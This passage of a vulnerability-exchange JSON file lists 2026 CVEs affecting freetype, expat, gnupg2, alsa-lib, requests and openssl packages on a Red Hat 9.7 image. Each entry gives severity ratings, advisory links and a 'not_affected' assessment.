        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-23865"
        },
        {
          "url": "https://www.facebook.com/security/advisories/cve-2026-23865"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA"
        }
      ],
      "published": "2026-03-02T17:16:32+00:00",
      "updated": "2026-05-01T17:41:13+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.10.4-10.el9_5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-24515",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24515"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1131"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8023-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24515"
        }
      ],
      "published": "2026-01-23T08:16:01+00:00",
      "updated": "2026-02-05T17:27:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.5.0-5.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-24883",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In GnuPG before 2.5.17, a long signature packet length causes parse_signature to return success with sig->data[] set to a NULL value, leading to a denial of service (application crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24883"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24883"
        },
        {
          "url": "https://dev.gnupg.org/T8049"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24883"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24883"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/01/27/8"
        }
      ],
      "published": "2026-01-27T19:16:16+00:00",
      "updated": "2026-02-06T18:06:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-25068",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        129
      ],
      "description": "alsa-lib versions 1.2.2 up to and including 1.2.15.2, prior to commit 5f7fe33, contain a heap-based buffer overflow in the topology mixer control decoder. The tplg_decode_control_mixer1() function reads the num_channels field from untrusted .tplg data and uses it as a loop bound without validating it against the fixed-size channel array (SND_TPLG_MAX_CHAN). A crafted topology file with an excessive num_channels value can cause out-of-bounds heap writes, leading to a crash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25068"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25068"
        },
        {
          "url": "https://github.com/alsa-project/alsa-lib/commit/5f7fe33002d2d98d84f72e381ec2cccc0d5d3d40"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25068"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8044-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25068"
        },
        {
          "url": "https://www.vulncheck.com/advisories/alsa-lib-topology-decoder-heap-based-buffer-overflow"
        }
      ],
      "published": "2026-01-29T20:16:10+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.2.14-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-25645",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        377
      ],
      "description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
      "recommendation": "Upgrade requests to version 2.33.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25645"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25645"
        },
        {
          "url": "https://github.com/psf/requests"
        },
        {
          "url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"
        },
        {
          "url": "https://github.com/psf/requests/releases/tag/v2.33.0"
        },
        {
          "url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25645"
        }
      ],
      "published": "2026-03-25T17:16:52+00:00",
      "updated": "2026-03-30T14:23:16+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/requests@2.32.5",
          "versions": [
            {
              "version": "2.32.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-2673",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        757
      ],
      "description": "Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected\npreferred key exchange group when its key exchange group configuration includes\nthe default by using the 'DEFAULT' keyword.\n\nImpact summary: A less preferred key exchange may be used even when a more\npreferred group is supported by both client and server, if the group\nwas not included among the client's initial predicated keyshares.\nThis will sometimes be the case with the new hybrid post-quantum groups,\nif the client chooses to defer their use until specifically requested by\nthe server.\n\nIf an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to\ninterpolate the built-in default group list into its own configuration, perhaps\nadding or removing specific elements, then an implementation defect causes the\n'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups\nwere treated as a single sufficiently secure 'tuple', with the server not\nsending a Hello Retry Request (HRR) even when a group in a more preferred tuple\nwas mutually supported.\n\nAs a result, the client and server might fail to negotiate a mutually supported\npost-quantum key agreement group, such as 'X25519MLKEM768', if the client's\nconfiguration results in only 'classical' groups (such as 'X25519' being the\nonly ones in the client's initial keyshare prediction).\n\nOpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS\n1.3 key agreement group on TLS servers.  The old syntax had a single 'flat'\nlist of groups, and treated all the supported groups as sufficiently secure.\nIf any of the keyshares predicted by the client were supported by the server\nthe most preferred among these was selected, even if other groups supported by\nthe client, but not included in the list of predicted keyshares would have been\nmore preferred, if included.\n\nThe new syntax partitions the groups into distinct 'tuples' of roughly\nequivalent security.  
Within each tuple the most preferred group included among\nthe client's predicted keyshares is chosen, but if the client supports a group\nfrom a more preferred tuple, but did not predict any corresponding keyshares,\nthe server will ask the client to retry the ClientHello (by issuing a Hello\nRetry Request or HRR) with the most preferred mutually supported group.\n\nThe above works as expected when the server's configuration uses the built-in\ndefault group list, or explicitly defines its own list by directly defining the\nvarious desired groups and group 'tuples'.\n\nNo OpenSSL FIPS modules are affected by this issue, the code in question lies\noutside the FIPS boundary.\n\nOpenSSL 3.6 and 3.5 are vulnerable to this issue.\n\nOpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released.\nOpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released.\n\nOpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2673"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/13/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2673"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-wj64-gh9j-xm82"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2157c9d81f7b0bd7dfa25b960e928ec28e8dd63f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/85977e013f32ceb96aa034c0e741adddc1a05e34"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2673"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260313.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2673"
        }
      ],
      "published": "2026-03-13T19:54:34+00:00",
      "updated": "2026-05-12T13:17:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.0.7-8.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.0.7-8.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
